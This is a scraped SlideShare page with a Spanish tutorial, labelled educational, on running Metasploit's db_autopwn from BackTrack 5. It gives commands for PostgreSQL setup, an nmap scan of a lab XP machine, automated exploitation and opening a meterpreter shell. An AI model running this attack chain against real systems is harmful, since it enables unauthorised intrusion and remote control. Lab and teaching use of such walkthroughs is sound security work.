Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
ESTE TUTORIAL ES PARA FINES EDUCATIVIOS            Como hacer un autopwn en backtrack 5 con nmap, metasploit y postgresqlA...
Aquí pones el password nuevo.ALTER USER postgres WITH PASSWORD password ;después   qsudo passwd -d postgressudo su postgre...
Ahora llamamos a metasploitmsfconsoledb_driver postgresqly para conectar con la base de datosdb_connect postgres:”password...
Nmap escaneo los puertos e identifico el sistema operativo de la víctima.Ahora procedemos con el ataque.db_hostsdb_autopwn...
Aquí se puede ver como entra al shell de windows desde meterpreter.                  ESTE TUTORIAL ES PARA FINES EDUCATIVIOS
Upcoming SlideShare
Loading in …5
×

Db autopwn backtrack_5

2,664 views

Published on

Hacer un db_autopwn en backtrack 5
http://linuxelcomienzodelalibertad.blogspot.com/

Published in: Education
  • Be the first to comment

Db autopwn backtrack_5

  1. 1. ESTE TUTORIAL ES PARA FINES EDUCATIVIOS Como hacer un autopwn en backtrack 5 con nmap, metasploit y postgresqlAquí les dejo el post original de la info para que lo verifiquen: Metasploit db_autopwn using PostgreSQLEl backtrack 5 no trae instalado el postgresql por eso deve escribir en una terminal:apt-get install postgresql libpq-devel libpq trabaja con las peticiones y respuestas entre cliente y servidor en el postgresql.Al finalizar la instalación conectamos con el postgresql y cambiamos el passwordsudo su postgres -c psql
  2. 2. Aquí pones el password nuevo.ALTER USER postgres WITH PASSWORD password ;después qsudo passwd -d postgressudo su postgres -c passwd con este se cambia el password Esto es para conectarse del ruby al postgresql.gem install pg
  3. 3. Ahora llamamos a metasploitmsfconsoledb_driver postgresqly para conectar con la base de datosdb_connect postgres:”password”@127.0.0.1/metasploitdbEl password que habías puesto anterior mente. Aquí va el nombre que le quiera asignar a la base de datos.Ahora utilizamos nmap para ver las vulnerabilidades de la víctima.nmap -sV -O 10.0.0.71 <-------- el numero ip de la víctima que para el tutorial es una maquina virtualde xp sp 1.
  4. 4. Nmap escaneo los puertos e identifico el sistema operativo de la víctima.Ahora procedemos con el ataque.db_hostsdb_autopwn -t -p -eAL terminar el autopwn muestra las posibles sesiones.Para entrar a una de ellassessions -i 1 el numero es la sesión que fue elegida.
  5. 5. Aquí se puede ver como entra al shell de windows desde meterpreter. ESTE TUTORIAL ES PARA FINES EDUCATIVIOS

×